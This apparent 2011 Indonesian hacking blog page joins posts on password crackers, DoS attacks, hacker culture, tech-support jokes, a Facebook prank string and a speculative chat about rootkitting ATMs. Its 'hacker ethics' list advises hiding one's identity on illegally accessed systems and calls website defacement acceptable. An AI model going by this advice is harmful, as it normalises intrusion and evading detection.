Sebuah password dapat dibongkar dengan menggunakan program yang disebut sebagai password cracker. Program password cracker adalah program yang mencoba membuka sebuah password yang telah terenkripsi dengan menggunakan sebuah algoritma tertentu dengan cara mencoba semua kemungkinan. Teknik ini sangatlah sederhana, tapi efektivitasnya luar biasa, dan tidak ada satu pun sistem yang aman dari serangan ini, meski teknik ini memakan waktu yang sangat lama, khususnya untuk password yang rumit.

Namun ini tidak berarti bahwa password cracker membutuhkan decrypt. Pada prakteknya, mereka kebayakan tidak melakukan itu. Umumnya, kita tidak dapat melakukan decrypt password-password yang sudah terenkripsi dengan algoritma yang kuat. Proses-proses enkripsi modern kebanyakan hanya memberikan satu jalan, di mana tidak ada proses pengembalian enkripsi. Namun, anda menggunakan tool-tool simulasi yang mempekerjakan algoritma yang sama yang digunakan untuk mengenkripsi password orisinal. Tool-tool tersebut membentuk analisa komparatif. Program password cracker tidak lain adalah mesin-mesin ulet. Ia akan mencoba kata demi kata dalam kecepatan tinggi. Mereka menganut "Azaz Keberuntungan", dengan harapan bahwa pada kesempatan tertentu mereka akan menemukan kata atau kalimat yang cocok. Teori ini mungkin tepat mengena pada anda yang terbiasa membuat password asal-asalan. Dan memang pada kenyataannya, password-password yang baik sulit untuk ditembus oleh program password cracker.


pengertian ddos atack

|0 komentar
pengertian ddos atack


Serangan DoS (bahasa Inggris: denial-of-service attacks')
adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).


  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian

Selasa, 06 September 2011

Pengertian Seorang Hacker

|0 komentar
Pengertian Seorang Hacker


Banyak dari kita beranggapan bahwa hacker itu jahat, hacker suka membobol ATM, membobol computer, membobol security , mencuri password atau pun bertindak yang merugikan orang lain. Sekarang anggapan seperti itu sebaiknya sobat-sobat hilangkan karena hacker itu tidak sejahat yang di bayangkan, bahkan tidak jahat sama sekali.

Hacker adalah sekumpulan atau beberapa kelompok yang memiliki tujuan untuk mengembangkan ilmu pengengetahuan dan sharing informasi bebas tanpa batas dan gratis. Hacker adalah seseorang yang ingin mengetahui secara mendalam mengenai kerja suatu system, komputer, atau jaringan komputer. Mereka terdiri dari para programer yang ahli jaringan dan karena mereka jugalah Internet tercipta sehingga kita bisa menikmatinya dan membuat kita lebih mudah mencari ilmu, sharing pengetahuan, dll. Internet sendiri di ciptakan lewat pengembangan sistem operasi UNIX.

Istilah Hacker lahir sekitar tahun 1959 dari MIT(Massacusetts Institute of Technology), sebuah universitas di Amerika yang terdiri dari orang-orang cerdas namun cenderung tidak mempercayai adanya Tuhan (Atheis). Saat itulah semua berawal, dari sebuah ruangan baru, “EAM room” pada Building 26 MIT, sebuah tempat yang merupakan nenek moyang dari “dunia baru” yang kini kita kenal, tempat nenek moyang sebuah mesin yang kini kita sebut sebagai “komputer”, mesin yang mampu membawa kita menuju kelebihbaikan dengan kebebasan informasi, dunia para Hacker sejati.

Sehebat apapun hacker tidak akan di hargai oleh hacker lain jika dirinya hanya mendapatkan ilmu dari hacker lain tanpa mau berusaha sendiri mencari ilmu. Para Hacker selalu bekerjasama secara sukarela menyelesaikan masalah dan membangun sesuatu. Mereka selalu berbagi informasi, memberi jawaban serta berlomba-lomba untuk berbuat yang terbaik agar dihormati di lingkungannya. Mereka tidak pernah berhenti belajar untuk menjadi ahli dan sangat anti untuk melakukan sesuatu berulang-ulang dan membosankan. Mereka berpedoman pada kata-kata bijak : “Untuk mengikuti jalan – pandanglah sang ahli – ikuti sang ahli – berjalan bersama sang ahli – kenali sang ahli -jadilah sang ahli ”.

Apakah agan,agan ingin menjadi seorang Hacker sejati? Tetapi menganggap bahwa untuk menjadi seorang Hacker itu sulit, harus mengerti bahasa pemrograman ? Jika sobat-sobat memiliki niat belajar sungguh-sungguh dan giat maka tidak ada kata sulit bagi sobat-sobat. Untuk menjadi seorang Hacker anda harus menguasai beberapa bahasa pemrograman dan tentu saja sikap-sikap yang bisa membuat anda diterima di lingkungan para Hacker. Biasanya calon Hacker memulai dengan belajar bahasa [Python] karena bahasa ini tergolong bahasa pemrograman yang termudah. Bahasan mengenai bahasa ini bisa anda lihat di www.python.org. Setelah itu anda juga harus menguasai [java] yang sedikit lebih sulit akan tetapi menghasilkan kode yang lebih cepat dari Python, [C], [C++] yang menjadi inti dari UNIX, dan [Perl] (http://www.perl.com ) serta [LISP] untuk tingkat lanjut.

Etika Hacker

1. Akses ke komputer-komputer – dan segala sesuatu yang berpotensi untuk mengajarmu mengenai dunia ini haruslah bebas dan total. Semua informasi haruslah tersedia secara bebas / cuma-cuma.

2. Jangan percaya otoriter/kemapanan – dukung desentralisasi.

3. Hackers haruslah dinilai berdasarkan kemampuan hackingnya – bukannya berdasar kriteria seperti derajat, umur, ras, atau posisi. Anda bisa berkarya seni dan keindahan melalui komputer. Komputer dapat merubah hidupmu menuju kelebih baikan.
Sedangkan dalam prakteknya, Etika Hacker diatas (prinsip) dipraktekkan dengan mengikuti kode etik:

4. Jangan merusak sistem manapun secara sengaja. (rmrf hard disk, crash, overflow, dll. Mengubah tampilan index.html sebuah website sah-sah saja asalkan file aslinya disimpan di sistem yang sama dan bisa diakses oleh administrator.)

5. Jangan mengubah file-file sistem selain yang diperlukan untuk mengamankan identitas anda.

6. Jangan meninggalkan nama asli anda (maupun orang lain), handle asli, maupun nomor telepon asli di sistem apapun yang anda akses secara ilegal. Mereka bisa dan akan melacak anda dari handle anda.

7. Berhati-hatilah dalam berbagi informasi sensitif. Pemerintah akan menjadi semakin pintar. Secara umum, jika anda tidak mengenal siapa sebenarnya lawan bicara/chatmu, berhati-hatilah!

8. Jangan memulai dengan mentargetkan komputer-komputer milik pemerintah. Ya, ada banyak sistem milik pemerintah yang cukup aman untuk di-hack, namun resikonya lebih besar dari keuntungannya. Ingat, pemerintah punya dana yang tak terbatas dibanding dengan ISP/Perusahaan yang objektifnya adalah untuk mencari profit.


Tingkatan-Tingkatan Dalam Hacker

Elite :

Dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka sangat mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

Semi Elite:

Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

Developed Kiddie:

Sebutan ini terutama karena umur kelompok ini masih muda (ABG) & masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

Script Kiddie:

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

Lamer:

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Mereka biasanya membaca atau mendengar tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Hacking Scene di Indonesia

Pada era 80-an hingga 1994, lahirlah para Hacker Indonesia yang boleh dibilang masih “ASLI”. Pada umumnya mereka lahir secara otodidak dan secara kebetulan memiliki akses jaringan. Biasanya terdiri dari para pegawai perusahaan-perusahaan besar atau instansi-instansi pemerintah. Mereka ini terdiri dari orang-orang yang berkecimpung di bidang UNIX, VAX/VMS, dan tentu saja ahli jaringan.
Ketika Internet mulai marak di Indonesia, mulailah masyarakat begitu antusias mempelajari komputer terutama network security. Jika dulunya tidak ada aktivitas yang bersifat merusak, kini perlahan hal itu mulai berubah. Remaja-remaja ABG mulai “berterbangan” di Internet, mencari tutorial-tutorial baru, mencari pengetahuan-pengetahuan komputer yang tidak mereka dapatkan di sekolah. Mereka menjadi semakin pintar, bahkan melebihi guru-guru di sekolah mereka.

Namun layaknya seorang ABG, sebagian besar dari mereka jiwanya masih labil. Pengetahuan mereka masih sangat minim dan memiliki semangat tinggi untuk merusak. Mereka masih belum mengerti arti “Hack” yang sebenarnya. Mereka dengan sombong dan tidak tau malu menyebut diri mereka Hacker hanya karena berhasil mengakali Billing, menjalankan email BOMB, menjalankan exploit-exploit. Padahal mereka sama sekali tidak tau bagaimana tool yang mereka gunakan itu sendiri bekerja. Mereka tidak mengenal sang system, namun dengan sombong mereka menyebut dirinya Hacker. Tanpa tau apa itu TCP/IP, namun dengan banga menyebut dirinya Hacker. Padahal para Hacker sejati Indonesia yang kemampuannya sudah setara dengan para wizard di Amerika dengan tegas menolak dirinya disebut Hacker lantaran masih selalu merasa ilmu yang dimilikinya belum cukup. Yeah, inilah Hacking Scene (pangung perhackingan) di Indonesia yang cukup menyedihkan ^_^ namun bisa juga diangap wajar dan manusiawi.

Akan tetapi tidak semua dari mereka yang hanya bermulut besar. Tentu saja pasti ada diantaranya yang benar-benar memiliki kemampuan walaupun jumlahnya sedikit. Mereka yang sedikit ini kemudian banyak yang mengadakan pertemuan-pertemuan baik secara sengaja maupun tidak sengaja. Mereka tetap berexplorasi dan mencari pengetahuan, beraktivitas seperti biasa di lingkungannya tanpa menimbulkan kecurigaan atau prasangka dari masyarakat sekitarnya.

Aktivitas-aktivitas yang kini mereka lakukan cukup beragam. Pada umumnya ialah memoderasi forum-forum dan milis besar, menjadi OP di IRC-IRC Channel ternama, saling berbagi pengetahuan dengan menulis tutorial-tutorial, Artikel, Advisories seputar bugs-bugs baru beserta cara pencegahannya, mengadakan seminar-seminar tentang Network Security, menulis program open-source, serta melakukan berbagai aktivitas “Hack” sebagai sarana pemenuhan kebutuhan untuk berexplorasi.

Pada umumnya para Hacker peka terhadap keadaan lingkungannya. Anggapan bahwa mereka adalah orang-orang yang individualis dan egois tampaknya harus segera dihapuskan. Hal ini telah lama terbukti, anda bisa menyaksikan sendiri bagaimana pertarungan para Hacker Indonesia dengan Hacker-Hacker Malaysia saat negara itu ingin merampas Ambalat dari Indonesia atau perseteruan Hacker Indonesia melawan Hacker-Hacker dari Australia saat mereka mengusik Indonesia. Inilah cara berbeda para Hacker dalam mempertahankan negaranya, bukan dengan senjata, bukan dengan kekerasan, namun dengan ilmu pengetahuan.

sekian dulu artikelnya..
semoga bermanfaat bagii qt smuaa...



  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian

Berbagai cerita konyol sejak komputer awal tercipta . .

|0 komentar
Berbagai cerita konyol sejak komputer awal tercipta . .


Berikut petikan keluhan-keluhan konsumen yang super konyol

1. Compaq pernah mempertimbangkan untuk mengubah perintah "Press ANY Key" menjadi "Press ENTER Key" dikarenakan banyaknya telepon yang menanyakan letak tombol ANY di keyboard.

2. AST Technical Support menerima laporan konsumen karena kesulitan menggunakan mouse. Saat Techinal Support berkunjung, mereka menemukan mouse tersebut tidak bisa digunakan, karena masih terbungkus rapi di dalam plastiknya. Penggunanya (seorang wanita) takut dengan mouse (tikus) sehingga tidak berani mengeluarkannya dari dalam plastik. Takut diserang mouse komputer.

3. Di tahun 1980-an, ketika disket masih berukuran besar, Teknisi Compaq pernah menerima keluhan seorang konsumen yang disketnya tidak terbaca oleh drive-disk komputer. Setelah diselidiki, ternyata konsumen itu sebelumnya memasukkan disket ke dalam mesin tik dan mengetikkan label yang tertempel di disket itu.

4. Sebuah keluhan lain dari konsumen AST yang mengatakan disket mereka terkena virus yang sulit dibersihkan. Petugas AST meminta orang itu mengirimkan kopi disket yang terinfeksi itu untuk dipelajari. Beberapa hari kemudian, petugas AST menerima foto kopi disket dari konsumen tersebut.

5. Seorang konsumen DELL mengeluhkan kalau dia tidak dapat mengirimkan fax via komputer. Setelah diarahkan selama 40 menit lewat telepon, petugas DELL menemukan kalau konsumen itu mencoba mengefax via komputer dengan cara memegang kertas yang akan di fax di depan monitor, sambil menekan tombol SEND di layar.

6. Seorang konsumen DELL lain mengeluh karena keyboard yang digunakannya sudah tidak bisa berfungsi sejak dibersihkan. Ketika ditanya caranya membersihkan keyboard, dia menjelaskan, Saya mencuci dan menggosok semua bagian keyboard dengan sabun, dan membilasnya dengan air, lalu menjemurnya.

7. Seorang konsumen DELL marah besar karena tidak bisa menyalakan komputer yang baru dibelinya. Semua sudah terpasang dengan baik. Tapi setiap kali saya tekan pedal kaki, tidak terjadi apa-apa. Setelah diselidiki ternyata pedal kaki yang dimaksud orang itu adalah mouse.

8. Seorang lagi konsumen DELL marah besar karena komputer barunya tidak nyala. Dia menjelaskan semua sudah terpasang dengan benar, dan ketika dia menunggu selama 20 menit, tidak terjadi apa-apa pada komputernya. Ketika teknisi DELL menanyakan apakah power switch sudah dinyalakan, dia balik bertanya, Power switch apa?

9. Berikut adalah tanya-jawab antara petugas Novell NetWire dengan seorang konsumen :

Penelepon : Hallo, dengan Tech Support
Novell : Ya, bisa dibantu

Penelepon : Tatakan cangkir di PC saya patah. Apa mungkin saya bisa menggantinya
Novell : Tatakan cangkir Apakah itu hadiah saat Anda membeli komputer

Penelepon : Tidak. Tatakan cangkir ini sudah ada di komputer saya. Dan ketika saya meletakkan gelas saya di atasnya, tatakan itu patah. Yang saya ketahui, di bagian depan tatakan itu ada tulisan CD-ROM, 16X.

Saat itu juga, petugas Novell langsung mematikan telepon dan tertawa terbahak-bahak.

membuat status kosong di facebook

|0 komentar


pernah liat orang Update Status kosong di facebook ?
atau temen kalian mengirim ke wall dinding kalian kosong ?
bingung ?..
Begini caranyaa..

yang pertama tentu masuk dulu ke akun facebook kalian

2. kemudian Copy ini berikut

Code:
@[2:2: ]

3. Paste di tempat buat Update Status atau Di profil teman kalian lalu share / bagikan.

4. Apa yang terjadi ?...

Yaaa.. kalian mengirim Status / pesan dinding kosong ke teman kalian..
Jadi yang muncul hanya nama kalian saja

Selamat buat ngerjain temen yang gaptek.


  1. misteri-misteri besar dibidang sains
  2. 6 perairan paling rawan perompak di dunia
  3. inilah 10 kota tertua didunia
  4. 10 bangunan megah yang dibangun di dalam air
  5. 10 raja yang mempunyai kelakuan unik
  6. 11 senjata canggih yang hanya dimiliki as
  7. foto-foto pembantaian yang dilakukan oleh nazi
  8. mengapa pelangi melengkung
  9. hal misterius tentang hujan
  10. 10 kesalah fahaman tentang sains
  11. sejarah gempabumi besar pada abad ke 20 dan 21
  12. 5 kota paling hijau didunia
  13. 5 experimen paling sadis yang pernah terjadi
  14. 10 lokasi harta karun yang menakjubkan
  15. mengenal laser
  16. ratusan pohon pinus misterius kejutkan polandia
  17. 10 patung unik yang ada di asia
  18. 5 manfaat minum bir
  19. cerita dibalik simbol-simbol teknologi
  20. kolam renang paling besar didunia
  21. susu tikus susu termahal didunia
  22. rumah yang berbentuk mata dewa horus
  23. blue ice fenomena
  24. efek negatif dari kurang tidur
  25. 5 senjata kimia yang paling berbahaya
  26. 7 kriteria pria yang harus dihindari
  27. berlibur di salah satu kota hantu di suriah
  28. siapakah penyumbang oksigen terbesar untuk bumi?
  29. kendaraan unik taun 70an
  30. film indonesia pertama yang masuk bioskop AS

Senin, 05 September 2011

Talking about Hacking ATM

|0 komentar
beberapa bulan ini lgi gencar-gencarnya penipuan yang bermodus pencurian uang melalui mesin ATM. tapi anehnya kita, kenapa yang dibahas malah cuman tentang nasib orang yang kecurian? emg penting bgt gitu gosipin orang..?wkwkwkwk. mending kita cari tahu apa yang terjadi dibalik itu. nah ngomong2 soal ATM, beberapa hari yang lalu..saya sedang melakukan pembicaraan dgn temen-temen sesama penghuni kolong jembatan yang kata orang-orang sih nyebutnya underground.. hihihi.

berikut pembicaraan saya dengan temen2 :

Saya : ngerti kalau kebanyakan mesin ATM itu jalan dengan menggunakan OS Windows-CE (walau ane sendiri pernah lihat ada yang run XP juga sihh ~.~"). Tapi pertanyaannya: "gimana sih tiap-tiap daripada mesin tersebut terhubung ke komputer HOST mereka?" -- Nirkabel? Atau masih Wired?

Mrs.SV: win ce? apa tuh? corporate edition? mohon bimbingan pak.

Saya : WinCE itu singkatan dari Windows Embedded Compact. Sistem yang dikembangkan Microsoft utk para developer (device makers). Dalam beberapa kasus sih OS ini dipakek sama developer mesin ATM utk jadi sistem mereka --

Tapi yang menarik dari itu semua adalah fakta bahwa rootkit utk OS itu bisa membuat kita "re-program" atau "ambil alih" sebuah mesin ATM. Hebat nya lagi bahkan REMOTELY! Hmm! Sudah pernah dicobakan pada mesin jenis Tranax dan Triton (milik USA). Gimana kalau dicoba ke Diebold (BCA pakek mesin ini). Wkwkwkw!

Mr. IK : Dulu di melbourne gw liat pakek windows nt, yg skarang pake itu smua?

Mr. IK : Btw atm klo ga salah masi connected pake LAN cable biasa kan? XD nyambung ke semacem VPN you know better ekwkwkwk klonga nanti malem bca matraman minta satpam gotong digeser ajeh bilang kartunya nyelip /gg

Saya : Dari apa yang gw tau sih semua nya masih pakek LAN yeh! That's why nanya, mgkn ada yg lbh tau ttg koneksi mrk ke Host? Hehe! Harus nya gw nanya org-org sebrang rumah yeh, van! Wkwkw!

Mr. AS : Jaman dulu ATM connect pakai protocol x.25 ke data centre, tapi skrg ATM di Indonesia connect ke data center protocol nya sudah IP Based, lewat media VSAT (satellite), liat aja deket2 ATM pasti ada antenna parabola nya, kalau ngga ada cari diatas gedung nya....dan mesin2 yang baru sudah windows semua...bbrp tahun lalu gua jadi konsultan di salah satu bank besar di Indonesia, sudah mulai di evaluasi penggunaan koneksi 3G connect ke data centre pakai IPSec VPN...yang jelas semua arahnya akan pakai IP based protocol...

Mr. IK : Ohh gw kirain itu cuma buat atm yg susah dijangkau broadband makasih sama master of networknkita utk penjelassannya wkwkwkw bearti klo parabolanya gw puter transaksi uang diproses ama satelit fox news kyknya keren jg

Saya : Wahh nice answer oom! Dlu emang pernah denger penggunaan VSAT itu, tp sempat tidak percaya setelah melihat demo penanaman rootkit-nya kemarin, haha, way too amazing! Hmm, one more question deh: "apakah bank-bank di Indo lebih merupakan penggemar NCR atau Diebold? Or any other brand?"

Mr.IK : Waktu kasus atm bca sapa yah? Gw inget ada sala satu supplier atmnya bca di ulas metro, nama pt indo tp brand imported machinenya ga dikasi tau.. Btw ebay tuh triton for 400 bucks kgk tau jaman apa kayaknya masi koneksi x.25 si oom bilang and warranty stikernya da void lol

Saya : ‎400bucks tadi bukan nya NCR boss Ivan? Hahaha!

Mr. AS : @Mr.IK: kebanyakan atm pakai vsat, mgkn pengecualian kalau gedung nya punya sendiri jadi bisa dpt akses jaringan yg terestrial (via copper cable or fiber), ganti pake wajan aje parabola nya...

@Saya: dulu sih bank yg gua tanganin tender nya... akhirnya yg menang NCR, diebold kayanya pemain baru deh, ncr udah lama maen di atm...rootkit ditanem dimana? perangkat vsat nya? Soalnya kalau dr atm ke host nya di datacenter kayanya udah pake encryption deh...ga yakin bisa di tanem rootkit...

Saya : Nah itu yang bikin gw bingung oom! All I know memang hubungan nya harusnya udah ter-enkripsi. Tapi ada gak sih kemungkinan seseorang melakukan dekripsi terhadap sistem tersebut? Kalau iyapun kan tapi rasanya bakalan makan waktu super lama y...eh ~.~" Nah ini orang bisa peragain ke beberapa model ATM dengan riset time yang relatif singkat (nyaris dibawah 12 bulan) -- dan gak mungkin kan semua brand pakek sistem enkripsi yang sama ~.~" Weird!

However, apa yang dia peragakan dibagi menjadi 2 bagian sih. Pertama-tama dia eksploitasi di sistem nya secara Client-Side, which is nggak terlalu amazing juga sih menurut gw, tapi fakta bahwa dia melakukan itu OVER THE PHONE! Hmm ~.~" Apa itu berarti Tranax udah menggunakan konsep 3G seperti yang waktu itu menurut lo baru lagi dikembangkan? Bagian keduanya, dia menggunakan key standar yang dia dapat dari lelang online di sekitar eBay, yang kemudian dia colokin pakek device USB sendiri ke si mesin, terus dijadikan media untuk masukin rootkit nya kedalam ATM itu (which I believe ini masih masuk dalam physical attack) -- dengan menggunakan rootkit ini kemudian dia bisa 'ambil alih' seluruh sistem mesin tersebut (termasuk diantaranya bisa melakukan record terhadap semua transaksi dan nyolong Admin Password). What's the most possible answer to this menurut lo oom?

Mr. IK : Klo pakek 3G route that's quite a shame for a system that's just been rolled out from development, tp kalo harus colok usb berarti yg attack harus ada physical key buat buka casing luarnya atm jg berarti scopenya shortlisted ke staff mainte...nance as the most likely attacker with such access

And klo 3G bearti sinyalnya broadcasted dong, reverse engineered pakek alat sniffer cia?

Mr. AS : @Saya & Mr.IK: kalau udah dpt akses physical mah anything is possible...

Mr. AS : attack over the phone ini berarti MITM (man in the middle) attack donk? Kalau udah di encrypt mana bisa di MITM? kalau udah di encrypt dari ujung ke ujung kan confidentiality and integrity nya harusnya udah secured....lha wong 3DES 56 bit a...ja meskipun bisa di break tapi setau gua pake computer yang super power kok...ini masa over the phone bisa nge-break encryption, yang setau gua di network nya aja udah di IPSec at least 3DES 168 bit...kalau bank2 besar mungkin AES 256 bit...belum lagi encryption di level aplikasi transaksi nya...plus nanti masuk ke data centre nya biasanya kalau bank besar lewat 2 lapis firewall + IPS yang beda vendor...tapi yaaa balik lagi...kalau udah dpt physical access mah anything is possible....


  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
